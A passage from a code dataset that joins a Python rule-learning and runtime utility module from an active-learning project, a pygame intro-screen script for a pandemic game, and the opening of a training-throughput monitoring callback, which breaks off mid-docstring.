updating\r\n self.balance = balance\r\n self.map = np.array(mainmap_knowledgeupdating)\r\n self.labelindex = labelindex\r\n self.splitters = splitters\r\n self.splitter_count = len(self.splitters)\r\n self.polar = polar\r\n self.raw_rule_approveprobability = None\r\n if type(metainfo.paras.raw_rule_approveprobability) == list:\r\n self.raw_rule_approveprobability = metainfo.paras.raw_rule_approveprobability[self.polar]\r\n else:\r\n self.raw_rule_approveprobability = metainfo.paras.raw_rule_approveprobability\r\n self.weight = weight\r\n self.probability = probability\r\n self.confidence_coefficient = confidence_coefficient\r\n self.premilinary_condition_predicates = premilinary_condition_predicates\r\n self.nondirectional_map = nondirectional_map\r\n self.conform_map = conform_map\r\n self.trees = [None] * self.splitter_count\r\n self.rules = [None] * self.splitter_count\r\n self.roottrees = roottrees\r\n if self.roottrees == None:\r\n self.roottrees = range(0, self.splitter_count)\r\n self.generatetrees()\r\n\r\n def generatetrees(self):\r\n for each_splitter_index in self.roottrees:\r\n self.trees[each_splitter_index] = runtime.forest.tree(self, each_splitter_index)\r\n self.rules[each_splitter_index] = self.trees[each_splitter_index].rules\r\n self.rules[each_splitter_index].sort(key=lambda x:x.criterion, reverse=True)\r\n\r\n class table:\r\n\r\n def __init__(self, fullmap, submap_indtrans, splitterindex, labelindex):\r\n self.splitter_map = np.array(fullmap[submap_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.label_map = np.array(fullmap[submap_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n self.labeled_indtrans = np.where(np.logical_and(np.logical_or(self.label_map == 0, self.label_map == 1), self.splitter_map != metainfo.top.NONE_VALUE))\r\n self.unlabeled_indtrans = np.where(np.logical_and(self.label_map == metainfo.top.INDETERMINATE, self.splitter_map != metainfo.top.NONE_VALUE))\r\n self.labeled_indtrans = runtime.indexes_transformer(submap_indtrans.fullindexes(self.labeled_indtrans))\r\n self.unlabeled_indtrans = runtime.indexes_transformer(submap_indtrans.fullindexes(self.unlabeled_indtrans))\r\n self.splitter_map_labeled = np.array(fullmap[self.labeled_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.splitter_map_unlabeled = np.array(fullmap[self.unlabeled_indtrans.subindexes[0], splitterindex]).reshape(-1, 1)\r\n self.label_map_labeled = np.array(fullmap[self.labeled_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n self.label_map_unlabeled = np.array(fullmap[self.unlabeled_indtrans.subindexes[0], labelindex]).reshape(-1, 1)\r\n\r\n class tree:\r\n\r\n def __init__(self, forest, root_splitter_index):\r\n self.forest = forest\r\n self.root_splitter_index = root_splitter_index\r\n self.map = self.forest.map\r\n self.nondirectional_map = self.forest.nondirectional_map\r\n self.conform_map = self.forest.conform_map\r\n self.labelindex = self.forest.labelindex\r\n self.polar = self.forest.polar\r\n self.rules = []\r\n self.split(depth_splitters=[], splitter_index=self.root_splitter_index, pre_predicates=[], pre_mainmap_indtrans=runtime.op_index_colon, pre_nondirectional_indtrans=runtime.op_index_colon, pre_conform_indtrans=runtime.op_index_colon)\r\n\r\n class rule:\r\n def __init__(self, predicates, premilinary_condition_predicates, polareffective, criterion, weight, stat_probability, confidence_coefficient, labeled_indexes, unlabeled_indexes, map_indtrans, nondirectional_labeled_indexes, nondirectional_indtrans, conform_labeled_indexes, conform_unlabeled_indexes, conform_indtrans):\r\n self.predicates = None\r\n if premilinary_condition_predicates != None:\r\n self.predicates = runtime.predicate.combine(premilinary_condition_predicates + predicates)\r\n else:\r\n self.predicates = predicates\r\n self.predicates = runtime.hashableset(self.predicates)\r\n self.predicatedisplays = ''\r\n self.gml = None\r\n self.criterion = criterion\r\n self.polareffective = polareffective\r\n if self.polareffective == True:\r\n assert(self.criterion >= 0)\r\n self.weight = weight\r\n self.stat_probability = stat_probability\r\n self.confidence_coefficient = confidence_coefficient\r\n self.polar = runtime.probabilitypolar(self.stat_probability)\r\n self.labeled_indexes = labeled_indexes\r\n self.unlabeled_indexes = unlabeled_indexes\r\n self.map_indtrans = map_indtrans\r\n self.nondirectional_labeled_indexes = nondirectional_labeled_indexes\r\n self.nondirectional_indtrans = nondirectional_indtrans\r\n self.conform_labeled_indexes = conform_labeled_indexes\r\n self.conform_unlabeled_indexes = conform_unlabeled_indexes\r\n self.conform_indtrans = conform_indtrans\r\n self.formfeature = runtime.hashableset()\r\n for each_predicate in self.predicates:\r\n self.formfeature.add(each_predicate.feature)\r\n self.resolution = len(self.labeled_indexes) + len(self.unlabeled_indexes)\r\n if self.nondirectional_labeled_indexes != None:\r\n self.resolution += len(self.nondirectional_labeled_indexes)\r\n if self.conform_labeled_indexes != None and self.conform_unlabeled_indexes != None:\r\n self.resolution += (len(self.conform_labeled_indexes) + len(self.conform_unlabeled_indexes))\r\n\r\n def split(self, depth_splitters, splitter_index, pre_predicates, pre_mainmap_indtrans, pre_nondirectional_indtrans, pre_conform_indtrans):\r\n depth_splitters.append(splitter_index)\r\n if pre_mainmap_indtrans == runtime.op_index_colon:\r\n pre_mainmap_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.map.shape[0])), [0] * self.map.shape[0]]))\r\n mainmap_table = runtime.forest.table(fullmap=self.map, submap_indtrans=pre_mainmap_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n pre_labeled_splittermap = mainmap_table.splitter_map_labeled\r\n pre_unlabeled_splittermap = mainmap_table.splitter_map_unlabeled\r\n pre_labeled_labelmap = mainmap_table.label_map_labeled\r\n pre_unlabeled_labelmap = mainmap_table.label_map_unlabeled\r\n pre_labeled_indtrans = mainmap_table.labeled_indtrans\r\n pre_unlabeled_indtrans = mainmap_table.unlabeled_indtrans\r\n nondirectional_pre_labeled_splittermap = None\r\n nondirectional_pre_labeled_labelmap = None\r\n nondirectional_pre_labeled_indtrans = None\r\n if runtime.isNone(self.nondirectional_map) == False and pre_nondirectional_indtrans != None:\r\n if pre_nondirectional_indtrans == runtime.op_index_colon:\r\n pre_nondirectional_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.nondirectional_map.shape[0])), [0] * self.nondirectional_map.shape[0]]))\r\n if runtime.isArrayEmpty(pre_nondirectional_indtrans.subindexes) == False:\r\n nondirectionalmap_table = runtime.forest.table(fullmap=self.nondirectional_map, submap_indtrans=pre_nondirectional_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n nondirectional_pre_labeled_splittermap = nondirectionalmap_table.splitter_map_labeled\r\n nondirectional_pre_labeled_labelmap = nondirectionalmap_table.label_map_labeled\r\n nondirectional_pre_labeled_indtrans = nondirectionalmap_table.labeled_indtrans\r\n conform_pre_labeled_splittermap = None\r\n conform_pre_unlabeled_splittermap = None\r\n conform_pre_labeled_labelmap = None\r\n conform_pre_unlabeled_labelmap = None\r\n conform_pre_labeled_indtrans = None\r\n conform_pre_unlabeled_indtrans = None\r\n if runtime.isNone(self.conform_map) == False and pre_conform_indtrans != None:\r\n if pre_conform_indtrans == runtime.op_index_colon:\r\n pre_conform_indtrans = runtime.indexes_transformer(tuple([list(range(0, self.conform_map.shape[0])), [0] * self.conform_map.shape[0]]))\r\n if runtime.isArrayEmpty(pre_conform_indtrans.subindexes) == False:\r\n conformmap_table = runtime.forest.table(fullmap=self.conform_map, submap_indtrans=pre_conform_indtrans, splitterindex=splitter_index, labelindex=self.labelindex)\r\n conform_pre_labeled_splittermap = conformmap_table.splitter_map_labeled\r\n conform_pre_unlabeled_splittermap = conformmap_table.splitter_map_unlabeled\r\n conform_pre_labeled_labelmap = conformmap_table.label_map_labeled\r\n conform_pre_unlabeled_labelmap = conformmap_table.label_map_unlabeled\r\n conform_pre_labeled_indtrans = conformmap_table.labeled_indtrans\r\n conform_pre_unlabeled_indtrans = conformmap_table.unlabeled_indtrans\r\n splitvalues = list(set(pre_labeled_splittermap.ravel()))\r\n splitvalues.sort(reverse=False)\r\n previoussplitvalue = (-1) * math.inf\r\n for eachsplitvalue in list(splitvalues):\r\n if eachsplitvalue - previoussplitvalue < metainfo.paras.tree_split_significantdelta:\r\n splitvalues.remove(eachsplitvalue)\r\n else:\r\n previoussplitvalue = eachsplitvalue\r\n assert(metainfo.top.NONE_VALUE not in splitvalues)\r\n # Avoid complete or sub-complete redundant selection predicates.\r\n splitvalues = runtime.completeset_redundant(splitvalues, self.polar)\r\n optimal_criterion = (-1) * math.inf\r\n optimal_rule_split = None\r\n if self.polar == 1:\r\n splitvalues.sort(reverse=True)\r\n for eachsplitvalue in splitvalues:\r\n currentrule = self.criterion(splitter_index, eachsplitvalue, pre_labeled_splittermap, pre_unlabeled_splittermap, pre_labeled_labelmap, pre_unlabeled_labelmap, pre_labeled_indtrans, pre_unlabeled_indtrans, pre_predicates, nondirectional_pre_labeled_splittermap, nondirectional_pre_labeled_labelmap, nondirectional_pre_labeled_indtrans, conform_pre_labeled_splittermap, conform_pre_unlabeled_splittermap, conform_pre_labeled_labelmap, conform_pre_unlabeled_labelmap, conform_pre_labeled_indtrans, conform_pre_unlabeled_indtrans)\r\n if currentrule.criterion >= optimal_criterion:\r\n optimal_rule_split = currentrule\r\n if currentrule.polareffective == False:\r\n break\r\n if optimal_rule_split != None:\r\n if optimal_rule_split.polareffective == True:\r\n self.rules.append(optimal_rule_split)\r\n if (metainfo.paras.tree_tridepth_exhausted == True or optimal_rule_split.polareffective == False) and len(depth_splitters) < metainfo.paras.tree_maxdepth:\r\n for each_next_splitter in range(0, self.forest.splitter_count):\r\n if each_next_splitter not in depth_splitters:\r\n self.split(depth_splitters=list(depth_splitters), splitter_index=each_next_splitter, pre_predicates=optimal_rule_split.predicates, pre_mainmap_indtrans=optimal_rule_split.map_indtrans, pre_nondirectional_indtrans=optimal_rule_split.nondirectional_indtrans, pre_conform_indtrans=optimal_rule_split.conform_indtrans)\r\n\r\n def criterion(self, splitter_index, splitvalue, pre_labeled_splittermap, pre_unlabeled_splittermap, pre_labeled_labelmap, pre_unlabeled_labelmap, pre_labeled_indtrans, pre_unlabeled_indtrans, pre_predicates, nondirectional_pre_labeled_splittermap, nondirectional_pre_labeled_labelmap, nondirectional_pre_labeled_indtrans, conform_pre_labeled_splittermap, conform_pre_unlabeled_splittermap, conform_pre_labeled_labelmap, conform_pre_unlabeled_labelmap, conform_pre_labeled_indtrans, conform_pre_unlabeled_indtrans):\r\n from source.rule import confidence\r\n labeled_indexes = None\r\n unlabeled_indexes = None\r\n nondirectional_labeled_indexes = None\r\n conform_labeled_indexes = None\r\n conform_unlabeled_indexes = None\r\n if self.polar == 0:\r\n labeled_indexes = np.where(pre_labeled_splittermap <= splitvalue)\r\n unlabeled_indexes = np.where(pre_unlabeled_splittermap <= splitvalue)\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = np.where(nondirectional_pre_labeled_splittermap <= splitvalue)\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = np.where(conform_pre_labeled_splittermap <= splitvalue)\r\n conform_unlabeled_indexes = np.where(conform_pre_unlabeled_splittermap <= splitvalue)\r\n else:\r\n labeled_indexes = np.where(pre_labeled_splittermap >= splitvalue)\r\n unlabeled_indexes = np.where(pre_unlabeled_splittermap >= splitvalue)\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = np.where(nondirectional_pre_labeled_splittermap >= splitvalue)\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = np.where(conform_pre_labeled_splittermap >= splitvalue)\r\n conform_unlabeled_indexes = np.where(conform_pre_unlabeled_splittermap >= splitvalue)\r\n labeled_labels = pre_labeled_labelmap[labeled_indexes]\r\n unlabeled_labels = pre_unlabeled_labelmap[unlabeled_indexes]\r\n nondirectional_labeled_labels = []\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_labels = nondirectional_pre_labeled_labelmap[nondirectional_labeled_indexes]\r\n labeled_indexes = pre_labeled_indtrans.fullindexes(labeled_indexes)\r\n unlabeled_indexes = pre_unlabeled_indtrans.fullindexes(unlabeled_indexes)\r\n map_indexes = runtime.indexes_transformer.combine([labeled_indexes, unlabeled_indexes])\r\n assert(set(map_indexes[1]) == set([0]) or set(map_indexes[1]) == set())\r\n map_indexes[0].sort(reverse=False)\r\n map_indtrans = runtime.indexes_transformer(map_indexes)\r\n nondirectional_indtrans = None\r\n if runtime.isNone(nondirectional_pre_labeled_splittermap) == False:\r\n nondirectional_labeled_indexes = nondirectional_pre_labeled_indtrans.fullindexes(nondirectional_labeled_indexes)\r\n nondirectional_indexes = nondirectional_labeled_indexes\r\n nondirectional_indtrans = runtime.indexes_transformer(nondirectional_indexes)\r\n conform_indtrans = None\r\n if runtime.isNone(conform_pre_labeled_splittermap) == False:\r\n conform_labeled_indexes = conform_pre_labeled_indtrans.fullindexes(conform_labeled_indexes)\r\n conform_unlabeled_indexes = conform_pre_unlabeled_indtrans.fullindexes(conform_unlabeled_indexes)\r\n conform_indexes = runtime.indexes_transformer.combine([conform_labeled_indexes, conform_unlabeled_indexes])\r\n assert(set(conform_indexes[1]) == set([0]) or set(conform_indexes[1]) == set())\r\n conform_indexes[0].sort(reverse=False)\r\n conform_indtrans = runtime.indexes_transformer(conform_indexes)\r\n label1count = sum(labeled_labels) + sum(nondirectional_labeled_labels)\r\n label0count = len(labeled_labels) + len(nondirectional_labeled_labels) - label1count\r\n probability = self.forest.probability(balance=self.forest.balance, label1count=label1count, label0count=label0count)\r\n polareffective_skylinecoverage = None\r\n if self.polar == 0:\r\n polareffective_skylinecoverage = len(labeled_labels) - sum(labeled_labels)\r\n else:\r\n polareffective_skylinecoverage = sum(labeled_labels)\r\n rulearea = confidence.subarea(polar=self.polar, func_probability=self.forest.probability, subarea_pairs=None, label_pairs=None)\r\n rulearea.labeledcount = label0count + label1count\r\n rulearea.totalcount = label0count + label1count + len(unlabeled_indexes[0])\r\n confidence_coefficient = self.forest.confidence_coefficient(func_probability=self.forest.probability, subareas=rulearea)\r\n polareffective_weight = self.forest.weight(confidence_coefficient=1, balanceprobability=probability, polar=self.polar)\r\n polareffective = runtime.probabilitypolar(probability) == self.polar and confidence.effective(polareffective_weight, effectiveprobability=self.forest.raw_rule_approveprobability, effectiveweight=None)\r\n #weight = self.forest.weight(confidence_coefficient=confidence_coefficient, balanceprobability=probability, polar=self.polar)\r\n weight = polareffective_weight\r\n criterion = (-1) * math.inf\r\n if weight != None:\r\n criterion = math.fabs(weight)\r\n op = None\r\n if self.polar == 0:\r\n op = runtime.predicate.op.lesseq\r\n else:\r\n op = runtime.predicate.op.largereq\r\n predicates = list(pre_predicates)\r\n split_predicate = runtime.predicate(feature=self.forest.splitters[splitter_index], op=op, value=splitvalue)\r\n predicates.append(split_predicate)\r\n predicates = runtime.predicate.combine(predicates)\r\n therule = runtime.forest.tree.rule(predicates=predicates, premilinary_condition_predicates=self.forest.premilinary_condition_predicates, polareffective=polareffective, criterion=criterion, weight=weight, stat_probability=probability, confidence_coefficient=confidence_coefficient, labeled_indexes=labeled_indexes, unlabeled_indexes=unlabeled_indexes, map_indtrans=map_indtrans, nondirectional_labeled_indexes=nondirectional_labeled_indexes, nondirectional_indtrans=nondirectional_indtrans, conform_labeled_indexes=conform_labeled_indexes, conform_unlabeled_indexes=conform_unlabeled_indexes, conform_indtrans=conform_indtrans)\r\n return therule\r\n\r\n @staticmethod\r\n def asyncraise(tid, exctype = SystemExit):\r\n try:\r\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\r\n tid = tid.ident\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\r\n except Exception as e:\r\n runtime.console('Error > asyncraise tid: ' + str(tid), repr(e), runtime.console.styles.EXCEPTION)\r\n traceback.print_exc()\r\n\r\n class countdown:\r\n\r\n def __init__(self, t, info, prompt = None, period = 1):\r\n self.t = max(0, t)\r\n self.info = str(info)\r\n self.thread = None\r\n self.prompt = prompt\r\n self.period = period\r\n\r\n def perform(self):\r\n while self.t >= 0:\r\n mins, secs = divmod(self.t, 60)\r\n timer = runtime.console.color.BACKGROUND + '\\r' + self.info + ' in {:02d}:{:02d}'.format(mins, secs) + runtime.console.color.END\r\n if self.prompt != None:\r\n timer += (' >> ' + str(self.prompt) + ' :> ')\r\n sys.stdout.write(timer)\r\n sys.stdout.flush()\r\n time.sleep(self.period)\r\n self.t -= self.period\r\n\r\n def async_perform(self):\r\n self.thread = Thread(target=self.perform, args=())\r\n self.thread.start()\r\n\r\n def exit(self):\r\n self.t = (-1) * math.inf\r\n runtime.asyncraise(self.thread)\r\n\r\n\r\n class Thread_ReturnValue():\r\n\r\n def __init__(self):\r\n self.result = []\r\n\r\n @staticmethod\r\n def awaitinput(default, t, info, prompt = None, period = 1):\r\n def input_ReturnValue(Thread_ReturnValue):\r\n Thread_ReturnValue.result.append(input())\r\n def skipinput(inputthread,Thread_ReturnValue,default):\r\n runtime.asyncraise(inputthread)\r\n Thread_ReturnValue.result.append(default)\r\n Thread_ReturnValue.result.append(default)\r\n theinput = None\r\n Thread_ReturnValue = runtime.Thread_ReturnValue()\r\n inputthread = Thread(target=input_ReturnValue, args=(Thread_ReturnValue,))\r\n timer = Timer(t, skipinput, args=(inputthread,Thread_ReturnValue,default))\r\n timer.start()\r\n cd = runtime.countdown(t, info, prompt, period)\r\n cd.async_perform()\r\n inputthread.start()\r\n inputthread.join(t + 1)\r\n timer.cancel()\r\n cd.exit()\r\n if len(Thread_ReturnValue.result) == 1:\r\n if len(Thread_ReturnValue.result[0]) > 0:\r\n print('awaitinput =?', Thread_ReturnValue.result[0])\r\n cert = input('awaitinput :> ')\r\n if len(cert) != 0:\r\n Thread_ReturnValue.result[0] = cert\r\n else:\r\n Thread_ReturnValue.result[0] = default\r\n else:\r\n print()\r\n theinput = Thread_ReturnValue.result[0]\r\n print('awaitinput :=', theinput)\r\n return theinput\r\n\r\n @staticmethod\r\n def digit(number):\r\n thedigit = 0\r\n while number != 0:\r\n number = int(number/10)\r\n thedigit += 1\r\n return thedigit\r\n\r\n class nlp:\r\n # Auti Token Sparse problem fundamentally, instead of using Training-Test's Seeming Trick.\r\n\r\n def __init__(self, regulartokens, attributed_sentences):\r\n iter = 10\r\n workercount = cpu_count() / 2\r\n if workercount % 2 == 1:\r\n workercount *= 2\r\n workercount -= 2\r\n if workercount > 12:\r\n workercount = 12\r\n elif workercount < 2:\r\n workercount = 2\r\n workercount = int(workercount)\r\n self.wordlist = list(regulartokens)\r\n runtime.console('SGML > w2groups anti-sparse', str(len(self.wordlist)) + ' sentences processing, # multi-threads = ' + str(workercount) + ' / ' + str(cpu_count()) + ' ...', runtime.console.styles.INFO)\r\n self.wordvectors = []\r\n if attributed_sentences == None:\r\n self.model = None\r\n else:\r\n self.model = fasttext.FastText(attributed_sentences, min_count=1, workers=workercount, iter=iter)\r\n for each_regulartoken in self.wordlist:\r\n self.wordvectors.append(self.model.wv[each_regulartoken])\r\n conv_test_exp_multiplier = runtime.digit(len(self.wordvectors)) - 1\r\n conv_test = math.pow(10, conv_test_exp_multiplier) * 1e-9\r\n conv_test_print = -9 + conv_test_exp_multiplier\r\n runtime.console('SGML > w2groups anti-sparse', 'nltk :: KMeansClusterer clustering conv_threshold = 1e' + str(conv_test_print) + ' ... take times ...', runtime.console.styles.INFO)\r\n self.wordcluster = KMeansClusterer(metainfo.paras.nlpw2vgroups, distance=nltk.cluster.util.cosine_distance, repeats=iter, conv_test=conv_test, avoid_empty_clusters=True)\r\n self.assigned_clusters = self.wordcluster.cluster(self.wordvectors, assign_clusters=True)\r\n self.w2groups = {}\r\n for eachindex in range(0, len(self.wordlist)):\r\n eachword = self.wordlist[eachindex]\r\n self.w2groups[eachword] = self.assigned_clusters[eachindex]\r\n\r\n @staticmethod\r\n def confidentialsample(priorp, error, n_, N, P=None):\r\n if P == None:\r\n if n_ == N:\r\n return 1\r\n else:\r\n n = None\r\n if N != None:\r\n n = int(float(N - 1)/(N - n_) * n_)\r\n else:\r\n n = n_\r\n t = math.sqrt((float(n) * math.pow(error, 2))/(priorp * (1 - priorp)))\r\n P = stats.norm.cdf(t)\r\n return 1 - (1 - P) * 2\r\n else:\r\n t = stats.norm.ppf(1 - (1 - P)/2)\r\n n = int(math.pow(t,2) * priorp * (1 - priorp)/math.pow(error, 2))\r\n n_ = math.ceil(float(n)/(1 + float(1 + n)/N))\r\n return n_\r\n\r\n @staticmethod\r\n def issorted(iter, reverse):\r\n if reverse == False:\r\n return all([iter[i] <= iter[i + 1] for i in range(len(iter) - 1)])\r\n else:\r\n return all([iter[i] >= iter[i + 1] for i in range(len(iter) - 1)])\r\n\r\n @staticmethod\r\n @jit\r\n def recombination_jit(iter1, iter2, lenlimit, len1, len2):\r\n therecombination_jit = []\r\n for eachlenlimit1 in len1:\r\n for eachlenlimit2 in len2:\r\n combination1 = list()\r\n combination2 = list()\r\n for eachcombination1 in itertools.combinations(iter1, eachlenlimit1):\r\n combination1.append(set(eachcombination1))\r\n for eachcombination2 in itertools.combinations(iter2, eachlenlimit2):\r\n combination2.append(set(eachcombination2))\r\n for eachproductset in itertools.product(combination1, combination2):\r\n thisrecombination = set(eachproductset[0])\r\n thisrecombination.update(eachproductset[1])\r\n if len(thisrecombination) <= lenlimit and thisrecombination.issubset(iter1) == False and thisrecombination.issubset(iter2) == False:\r\n therecombination_jit.append(thisrecombination)\r\n return therecombination_jit\r\n\r\n @staticmethod\r\n def recombination(iter1, iter2, lenlimit, semisub, processed_cache):\r\n if (iter1, iter2) in processed_cache or (iter2, iter1) in processed_cache:\r\n return None\r\n len1 = None\r\n len2 = None\r\n if semisub == True:\r\n len1 = [max(int(len(iter1) / 2), 1)]\r\n len2 = [max(int(len(iter2) / 2), 1)]\r\n else:\r\n len1 = range(1, len(iter1) + 1)\r\n len2 = range(1, len(iter2) + 1)\r\n numba_coded = (range(0, len(iter1)), range(len(iter1), len(iter1) + len(iter2)))\r\n therecombination_jit = None\r\n if numba_coded in processed_cache:\r\n therecombination_jit = processed_cache[numba_coded]\r\n else:\r\n therecombination_jit = runtime.recombination_jit(range(0, len(iter1)), range(len(iter1), len(iter1) + len(iter2)), lenlimit, len1, len2)\r\n processed_cache[numba_coded] = therecombination_jit\r\n processed_cache[(iter1, iter2)] = metainfo.top.AUTO\r\n iter = list(iter1)\r\n iter += list(iter2)\r\n therecombination = set()\r\n for eachcombination_jit in therecombination_jit:\r\n currentcombination = []\r\n for eachindex in eachcombination_jit:\r\n currentcombination.append(iter[eachindex])\r\n currentcombination = runtime.hashableset(runtime.predicate.combine(currentcombination))\r\n if runtime.predicate.issmallerthan(currentcombination, iter1) == False and runtime.predicate.issmallerthan(currentcombination, iter2) == False:\r\n therecombination.add(currentcombination)\r\n return therecombination\r\n\r\n @staticmethod\r\n def display(header, space, dictcontent=None):\r\n if dictcontent == None:\r\n displaystr = ''\r\n for eachvindex in range(0, len(header)):\r\n currentv = header[eachvindex]\r\n currentv = str(currentv)\r\n displaystr += currentv\r\n displaystr += ' ' * (space[eachvindex] - len(currentv))\r\n return displaystr\r\n else:\r\n if type(dictcontent) != list:\r\n dictcontent = [dictcontent] * len(header)\r\n displaydict = {}\r\n for eachvindex in range(0, len(header)):\r\n currentv = header[eachvindex]\r\n currentv = str(currentv)\r\n displaydict[currentv] = str(dictcontent[eachvindex])\r\n return displaydict\r\n\r\n @staticmethod\r\n def dellist(thelist, delindexes):\r\n return [thelist[i] for i in range(0, len(thelist)) if i not in delindexes]\r\n\r\n @staticmethod\r\n def fitprobability(labellist, polar, balance1_multiplier):\r\n labellist = np.array(labellist, dtype=np.int64)\r\n labellist = np.fabs(1 - polar - labellist)\r\n labellist = labellist.astype(np.int64)\r\n totalmass = None\r\n if balance1_multiplier != None:\r\n balancer = None\r\n if polar == 0:\r\n balancer = float(1) / balance1_multiplier\r\n else:\r\n balancer = balance1_multiplier\r\n bincount = np.bincount(labellist)\r\n labellist = labellist.astype(np.float64)\r\n labellist *= balancer\r\n totalmass = balancer * bincount[1] + bincount[0]\r\n else:\r\n totalmass = len(labellist)\r\n fitness = float(np.sum(labellist)) / totalmass\r\n return fitness\r\n\r\n @staticmethod\r\n def setcompare(set_1, set_2, method):\r\n if method == 'distinct':\r\n return len(set_1 - set_2)\r\n elif method == 'jaccard':\r\n intersection = set_1.intersection(set_2)\r\n union = set_1.union(set_2)\r\n return float(len(intersection)) / len(union)\r\n\r\n @staticmethod\r\n def sortbased(aim, score, reverse):\r\n if reverse == False:\r\n return np.array(aim)[np.argsort(score)], np.array(score)[np.argsort(score)]\r\n else:\r\n return np.array(aim)[np.argsort(np.array(score) * (-1))], np.array(score)[np.argsort(np.array(score) * (-1))]\r\n\r\n class minmax:\r\n def __init__(self, min, max):\r\n self.min = min\r\n self.max = max\r\n\r\n @staticmethod\r\n def cmp(x, y):\r\n if x < y:\r\n return -1\r\n elif x > y:\r\n return 1\r\n else:\r\n return 0\r\n\r\n @staticmethod\r\n def cmp_reverse(x, y):\r\n if x < y:\r\n return 1\r\n elif x > y:\r\n return -1\r\n else:\r\n return 0\r\n\r\n @staticmethod\r\n def sidesort(sortaim):\r\n i = np.array(range(0, len(sortaim)))\r\n mid = 0.5 * (i[0] + i[-1])\r\n x = - np.fabs(i - mid)\r\n xs = np.argsort(x)\r\n return xs, np.array(sortaim)[xs].tolist()","repo_name":"wailler/ActiveGML","sub_path":"source/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":116157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72203129767","text":"import os\nimport pygame\nfrom constants import BACKGROUND, screen,SCREEN_WIDTH, SCREEN_HEIGHT\nfrom pygame import mixer\n\ndef intro(clock,screen):\n\n game_icon=pygame.image.load(os.path.join('assets','icon.png'))\n pygame.display.set_icon(game_icon)\n pygame.display.set_caption('QUARENTINE: THE PANDEMIC GAME')\n\n\n mixer.music.load(os.path.join('assets','alexander-nakarada-chase.ogg'))\n mixer.music.play(-1)\n\n for i in range(1,20):\n clock.tick(20)\n if i<10:\n image='ezgif-frame-00{}.png'.format(str(i))\n else:\n image='ezgif-frame-0{}.png'.format(str(i))\n image=pygame.image.load(os.path.join('assets','Intro I', image))\n image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n screen.blit(image, (0, 0))\n pygame.display.update()\n\n for i in range(1,51):\n clock.tick(100)\n if i<10:\n image='ezgif-frame-00{}.png'.format(str(i))\n else:\n image='ezgif-frame-0{}.png'.format(str(i))\n image=pygame.image.load(os.path.join('assets','Intro II', image))\n image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n screen.blit(image, (0, 0))\n pygame.display.update()\n\n background = pygame.Surface(screen.get_size())\n background = background.convert()\n\n for i in range(0,15):\n clock.tick(20)\n possibleColors=[(250, 250, 250),(250, 0, 0),(0, 0, 0)]\n background.fill(possibleColors[i%3])\n screen.blit(background, (0, 0))\n pygame.display.update()\n\n start=False\n while(not start):\n clock.tick(10)\n image=pygame.image.load(os.path.join('assets','Quarantine The Pandemic Game.png'))\n image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n screen.blit(image, (0, 0))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP:\n x,y=pygame.mouse.get_pos()\n if x>=600*SCREEN_WIDTH/1600 and x<=880*SCREEN_WIDTH/1600:\n if y>=710*SCREEN_HEIGHT/900 and y<=830*SCREEN_HEIGHT/900:\n start=True\n if event.type == pygame.QUIT:\n pygame.quit()\n for i in range(1,126):\n if i==22:\n clock.tick(0.5)\n elif i==47:\n clock.tick(0.5)\n elif i==73:\n clock.tick(0.5)\n elif i==96:\n clock.tick(0.2)\n else:\n clock.tick(15)\n if i<10:\n image='ezgif-frame-00{}.png'.format(str(i))\n elif i<100:\n image='ezgif-frame-0{}.png'.format(str(i))\n else:\n image='ezgif-frame-{}.png'.format(str(i))\n image=pygame.image.load(os.path.join('assets','Inicio do Jogo', image))\n image=pygame.transform.scale(image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n screen.blit(image, (0, 0))\n pygame.display.update()\n\n\n ","repo_name":"davixie/CES22_PlantsVsZombies","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72638576168","text":"from __future__ import annotations\n\nimport time\nfrom collections import deque\nfrom typing import Any, Deque, Dict, Optional\n\nfrom composer.core import State\nfrom composer.core.callback import Callback\nfrom composer.loggers import Logger\n\n__all__ = [\"SpeedMonitor\"]\n\n\nclass SpeedMonitor(Callback):\n \"\"\"Logs the training throughput.\n\n The training throughput in terms of number of samples per second is logged on the\n :attr:`~composer.core.event.Event.BATCH_END` event if we have reached the ``window_size`` threshold. Per epoch\n average throughput and wall clock train, validation, and total time is also logged on the\n :attr:`~composer.core.event.Event.EPOCH_END` event.\n\n Example\n\n .. doctest::\n\n >>> from composer.callbacks import SpeedMonitor\n >>> # constructing trainer object with this callback\n >>> trainer = Trainer(\n ... model=model,\n ... train_dataloader=train_dataloader,\n ... eval_dataloader=eval_dataloader,\n ... optimizers=optimizer,\n ... max_duration=\"1ep\",\n ... 